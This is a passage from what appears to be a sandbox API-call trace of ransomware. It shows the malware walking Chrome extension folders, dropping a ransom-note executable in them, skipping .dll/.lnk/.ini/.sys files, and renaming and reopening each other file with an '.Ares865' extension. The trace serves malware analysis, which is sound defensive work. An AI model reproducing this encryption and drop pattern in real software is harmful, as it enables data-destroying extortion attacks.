Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.ares865"), dwFlags=0x1) returned 1 [0100.692] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\view.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.692] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2373) returned 1 [0100.697] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup" [0100.697] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup" [0100.697] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.697] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.698] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.698] GetLastError () returned 0x0 [0100.698] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.698] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83663ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e253e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e253e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.699] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.699] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.699] lstrcpyW (in: lpString1=0x2cce526, lpString2="cast_app.css" | out: lpString1="cast_app.css") returned="cast_app.css" [0100.699] lstrlenW (lpString="cast_app.css") returned 12 [0100.699] lstrlenW (lpString="Ares865") returned 7 [0100.699] lstrcmpiW (lpString1="app.css", lpString2="Ares865") returned -1 [0100.699] lstrlenW (lpString=".dll") returned 4 [0100.699] lstrcmpiW (lpString1="cast_app.css", lpString2=".dll") returned 1 [0100.699] lstrlenW (lpString=".lnk") returned 4 [0100.699] lstrcmpiW (lpString1="cast_app.css", lpString2=".lnk") returned 1 [0100.699] lstrlenW (lpString=".ini") returned 4 [0100.699] lstrcmpiW (lpString1="cast_app.css", lpString2=".ini") returned 1 [0100.699] lstrlenW (lpString=".sys") returned 4 [0100.699] lstrcmpiW (lpString1="cast_app.css", lpString2=".sys") returned 1 [0100.699] lstrlenW (lpString="cast_app.css") returned 12 [0100.699] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.Ares865") returned 167 [0100.699] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.ares865"), dwFlags=0x1) returned 1 [0100.701] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.css.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.701] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6685) returned 1 [0100.706] lstrcpyW (in: lpString1=0x2cce526, lpString2="cast_app.js" | out: lpString1="cast_app.js") returned="cast_app.js" [0100.706] lstrlenW (lpString="cast_app.js") returned 11 [0100.706] lstrlenW (lpString="Ares865") returned 7 [0100.706] lstrcmpiW (lpString1="_app.js", lpString2="Ares865") returned -1 [0100.706] lstrlenW (lpString=".dll") returned 4 [0100.706] lstrcmpiW (lpString1="cast_app.js", lpString2=".dll") returned 1 [0100.706] lstrlenW (lpString=".lnk") returned 4 [0100.706] lstrcmpiW (lpString1="cast_app.js", lpString2=".lnk") returned 1 [0100.706] lstrlenW (lpString=".ini") returned 4 [0100.706] lstrcmpiW (lpString1="cast_app.js", lpString2=".ini") returned 1 [0100.706] lstrlenW (lpString=".sys") returned 4 [0100.706] lstrcmpiW (lpString1="cast_app.js", lpString2=".sys") returned 1 [0100.706] lstrlenW (lpString="cast_app.js") returned 11 [0100.706] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.Ares865") returned 166 [0100.706] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.ares865"), dwFlags=0x1) returned 1 [0100.709] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.710] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=139738) returned 1 [0100.720] lstrcpyW (in: lpString1=0x2cce526, lpString2="cast_app_redirect.js" | out: lpString1="cast_app_redirect.js") returned="cast_app_redirect.js" [0100.720] lstrlenW (lpString="cast_app_redirect.js") returned 20 [0100.720] lstrlenW (lpString="Ares865") returned 7 [0100.720] lstrcmpiW (lpString1="rect.js", lpString2="Ares865") returned 1 [0100.720] lstrlenW (lpString=".dll") returned 4 [0100.720] lstrcmpiW (lpString1="cast_app_redirect.js", lpString2=".dll") returned 1 [0100.720] lstrlenW (lpString=".lnk") returned 4 [0100.720] lstrcmpiW (lpString1="cast_app_redirect.js", lpString2=".lnk") returned 1 [0100.720] lstrlenW (lpString=".ini") returned 4 [0100.720] lstrcmpiW (lpString1="cast_app_redirect.js", lpString2=".ini") returned 1 [0100.720] lstrlenW (lpString=".sys") returned 4 [0100.720] lstrcmpiW (lpString1="cast_app_redirect.js", lpString2=".sys") returned 1 [0100.720] lstrlenW (lpString="cast_app_redirect.js") returned 20 [0100.720] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.Ares865") returned 175 [0100.720] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.ares865"), dwFlags=0x1) returned 1 [0100.727] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.727] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=242) returned 1 [0100.731] lstrcpyW (in: lpString1=0x2cce526, lpString2="chromecast_logo_grey.png" | out: lpString1="chromecast_logo_grey.png") returned="chromecast_logo_grey.png" [0100.731] lstrlenW (lpString="chromecast_logo_grey.png") returned 24 [0100.731] lstrlenW (lpString="Ares865") returned 7 [0100.731] lstrcmpiW (lpString1="rey.png", lpString2="Ares865") returned 1 [0100.731] lstrlenW (lpString=".dll") returned 4 [0100.731] lstrcmpiW (lpString1="chromecast_logo_grey.png", lpString2=".dll") returned 1 [0100.731] lstrlenW (lpString=".lnk") returned 4 [0100.731] lstrcmpiW (lpString1="chromecast_logo_grey.png", lpString2=".lnk") returned 1 [0100.731] lstrlenW (lpString=".ini") returned 4 [0100.731] lstrcmpiW (lpString1="chromecast_logo_grey.png", lpString2=".ini") returned 1 [0100.731] lstrlenW (lpString=".sys") returned 4 [0100.731] lstrcmpiW (lpString1="chromecast_logo_grey.png", lpString2=".sys") returned 1 [0100.731] lstrlenW (lpString="chromecast_logo_grey.png") returned 24 [0100.731] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.Ares865") returned 179 [0100.731] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.ares865"), dwFlags=0x1) returned 1 [0100.732] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\chromecast_logo_grey.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.733] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7151) returned 1 [0100.736] lstrcpyW (in: lpString1=0x2cce526, lpString2="devices.html" | out: lpString1="devices.html") returned="devices.html" [0100.736] lstrlenW (lpString="devices.html") returned 12 [0100.736] lstrlenW (lpString="Ares865") returned 7 [0100.736] lstrcmpiW (lpString1="es.html", lpString2="Ares865") returned 1 [0100.736] lstrlenW (lpString=".dll") returned 4 [0100.736] lstrcmpiW (lpString1="devices.html", lpString2=".dll") returned 1 [0100.736] lstrlenW (lpString=".lnk") returned 4 [0100.736] lstrcmpiW (lpString1="devices.html", lpString2=".lnk") returned 1 [0100.736] lstrlenW (lpString=".ini") returned 4 [0100.736] lstrcmpiW (lpString1="devices.html", lpString2=".ini") returned 1 [0100.736] lstrlenW (lpString=".sys") returned 4 [0100.736] lstrcmpiW (lpString1="devices.html", lpString2=".sys") returned 1 [0100.736] lstrlenW (lpString="devices.html") returned 12 [0100.737] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.Ares865") returned 167 [0100.737] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.ares865"), dwFlags=0x1) returned 1 [0100.738] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\devices.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.738] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=59) returned 1 [0100.743] lstrcpyW (in: lpString1=0x2cce526, lpString2="index.html" | out: lpString1="index.html") returned="index.html" [0100.743] lstrlenW (lpString="index.html") returned 10 [0100.743] lstrlenW (lpString="Ares865") returned 7 [0100.743] lstrcmpiW (lpString1="ex.html", lpString2="Ares865") returned 1 [0100.743] lstrlenW (lpString=".dll") returned 4 [0100.743] lstrcmpiW (lpString1="index.html", lpString2=".dll") returned 1 [0100.743] lstrlenW (lpString=".lnk") returned 4 [0100.743] lstrcmpiW (lpString1="index.html", lpString2=".lnk") returned 1 [0100.743] lstrlenW (lpString=".ini") returned 4 [0100.743] lstrcmpiW (lpString1="index.html", lpString2=".ini") returned 1 [0100.743] lstrlenW (lpString=".sys") returned 4 [0100.743] lstrcmpiW (lpString1="index.html", lpString2=".sys") returned 1 [0100.743] lstrlenW (lpString="index.html") returned 10 [0100.743] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.Ares865") returned 165 [0100.743] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.ares865"), dwFlags=0x1) returned 1 [0100.745] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\index.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.745] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2088) returned 1 [0100.748] lstrcpyW (in: lpString1=0x2cce526, lpString2="offers.html" | out: lpString1="offers.html") returned="offers.html" [0100.748] lstrlenW (lpString="offers.html") returned 11 [0100.748] lstrlenW (lpString="Ares865") returned 7 [0100.748] lstrcmpiW (lpString1="rs.html", lpString2="Ares865") returned 1 [0100.748] lstrlenW (lpString=".dll") returned 4 [0100.748] lstrcmpiW (lpString1="offers.html", lpString2=".dll") returned 1 [0100.748] lstrlenW (lpString=".lnk") returned 4 [0100.748] lstrcmpiW (lpString1="offers.html", lpString2=".lnk") returned 1 [0100.748] lstrlenW (lpString=".ini") returned 4 [0100.748] lstrcmpiW (lpString1="offers.html", lpString2=".ini") returned 1 [0100.748] lstrlenW (lpString=".sys") returned 4 [0100.748] lstrcmpiW (lpString1="offers.html", lpString2=".sys") returned 1 [0100.748] lstrlenW (lpString="offers.html") returned 11 [0100.748] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.Ares865") returned 166 [0100.748] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.ares865"), dwFlags=0x1) returned 1 [0100.749] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\offers.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.750] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=59) returned 1 [0100.753] lstrcpyW (in: lpString1=0x2cce526, lpString2="setup.html" | out: lpString1="setup.html") returned="setup.html" [0100.753] lstrlenW (lpString="setup.html") returned 10 [0100.753] lstrlenW (lpString="Ares865") returned 7 [0100.753] lstrcmpiW (lpString1="up.html", lpString2="Ares865") returned 1 [0100.753] lstrlenW (lpString=".dll") returned 4 [0100.753] lstrcmpiW (lpString1="setup.html", lpString2=".dll") returned 1 [0100.753] lstrlenW (lpString=".lnk") returned 4 [0100.753] lstrcmpiW (lpString1="setup.html", lpString2=".lnk") returned 1 [0100.753] lstrlenW (lpString=".ini") returned 4 [0100.753] lstrcmpiW (lpString1="setup.html", lpString2=".ini") returned 1 [0100.753] lstrlenW (lpString=".sys") returned 4 [0100.753] lstrcmpiW (lpString1="setup.html", lpString2=".sys") returned 1 [0100.753] lstrlenW (lpString="setup.html") returned 10 [0100.753] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.Ares865") returned 165 [0100.753] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.ares865"), dwFlags=0x1) returned 1 [0100.754] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\setup.html.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.755] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=59) returned 1 